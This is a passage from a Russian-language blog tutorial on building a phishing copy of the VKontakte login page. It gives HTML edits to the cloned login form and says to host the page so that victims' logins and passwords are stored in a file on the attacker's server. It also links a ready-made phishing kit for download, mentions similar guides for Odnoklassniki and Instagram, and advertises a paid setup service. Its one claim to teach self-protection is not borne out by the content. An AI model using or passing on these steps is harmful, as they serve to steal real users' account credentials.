<INPUT name=”pass” id=”quick_pass” onfocus=”show(‘quick_expire’)”type=”password”>

Меняем на это:

<INPUT name=”zena” id=”quick_pass” onfocus=”show(‘quick_expire’)”type=”password”>

Дальше необходимо кнопку «Войти» включить в форму, чтобы она работала, для этого, находим чуть ниже закрывающийся тег </form>, вырезаем его и вставляем его вот тут.

<DIV class=”button_blue button_wide”><BUTTON id=”quick_login_button”>Войти</BUTTON></form></DIV>

Сохраняем index.html, и у вас в итоге получилось два файла и одна папка. Дальше все это дело нужно будет залить на ваш хостинг. Вот этим https://beget.com можно месяц бесплатно пользоваться, можно купить на месяц,  всего 150 рублей. Я думаю, вы умеете это делать, если нет, задайте вопрос в комментариях.
Когда жертва зайдет на вашу страничку фишинговую, введет «логин» и «пароль», у вас создаться на хостинге еще один файл, ups.php в нем и будут храниться учетные записи.

Рассказ о том как залить все это дело на хостинг

Вывод

В этой статье вы узнали, как себя обезопасить и не попасться на фишинговый сайт. Как создать фишинговый сайт. Скачать готовый, фишинг для вконтакта, можно ниже, для ознакомительных целей.

Скачать готовый фишинговый сайт для вконтакте.

Друзья, пройдите опрос на тему какие еще фишинги можно сделать и нужны ли они у нас в группе: https://vk.com/27sysday

1. Вышла новая статья про фишинг в одноклассниках.
2. Вышла новая статья про фишинг в инстаграм.

В связи с большим количеством обращений, решил создать услугу по настройке.

Что понадобится

1. Вам нужно зарегистрироваться https://beget.com
2. Связать со мной в телеграм.
3. Сказать мне логин и пароль.
4. Пополнить баланс телефона на 1500 рублей (тел. скажу в скайпе).
5. Через час после оплаты, получите готовое решение.

Следующая

РоутерКак защитить свой роутера от взлома?